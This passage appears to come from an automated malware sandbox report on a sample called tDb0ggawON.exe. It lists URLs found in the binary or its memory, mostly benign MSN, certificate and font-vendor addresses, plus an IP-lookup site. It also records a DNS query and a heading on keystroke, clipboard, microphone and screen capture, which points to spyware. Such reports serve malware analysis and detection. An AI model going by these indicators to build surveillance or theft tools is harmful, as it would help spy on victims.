Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuqZ9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvrrg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXiwM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18qTPD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xJbM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yHSm?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yKf2?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ylKx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yqHP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB46JmN?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0:
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0B
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0E
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0F
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0K
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0M
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0R
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.pki.goog/gsr202
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp2.globalsign.com/cloudsslsha2g30V
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
                  Source: tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://secure.globalsign.com/cacert/cloudsslsha2g3.crt06
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvrrg.img?h=166&w=310
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yHSm.img?h=75&w=100
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yqHP.img?h=75&w=100
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.264550366.0000000008857000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: tDb0ggawON.exe, 00000000.00000003.267830462.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269954755.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.265215188.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268801782.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268343485.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                  Source: tDb0ggawON.exe, 00000000.00000003.267830462.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269954755.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268801782.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268343485.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com6
                  Source: tDb0ggawON.exe, 00000000.00000003.267830462.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269954755.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268801782.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268343485.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comar
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.309924532.0000000008847000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.300716031.0000000008847000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: tDb0ggawON.exe, 00000000.00000002.309924532.0000000008847000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.300716031.0000000008847000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coml1
                  Source: tDb0ggawON.exe, 00000000.00000002.309924532.0000000008847000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.300716031.0000000008847000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.commcom
                  Source: tDb0ggawON.exe, 00000000.00000002.309924532.0000000008847000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.300716031.0000000008847000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoV
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: tDb0ggawON.exe, 00000000.00000003.263370600.000000000886C000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.263539092.0000000008872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.c
                  Source: tDb0ggawON.exe, 00000000.00000003.263370600.000000000886C000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.263616582.000000000886C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: tDb0ggawON.exe, 00000000.00000003.264108956.000000000886C000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.263616582.000000000886C000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.263972629.000000000886C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/t
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: tDb0ggawON.exe, 00000000.00000003.267830462.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269954755.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268287341.0000000008859000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268733117.0000000008855000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268545826.0000000008854000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3
                  Source: tDb0ggawON.exe, 00000000.00000003.268733117.0000000008855000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/:
                  Source: tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/A
                  Source: tDb0ggawON.exe, 00000000.00000003.267830462.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268287341.0000000008859000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268733117.0000000008855000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268545826.0000000008854000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/W
                  Source: tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                  Source: tDb0ggawON.exe, 00000000.00000003.268287341.0000000008859000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268733117.0000000008855000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268545826.0000000008854000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/H
Source: unknown; DNS traffic detected: queries for: 168.98.4.0.in-addr.arpa

Key, Mouse, Clipboard, Microphone and Screen Capturing

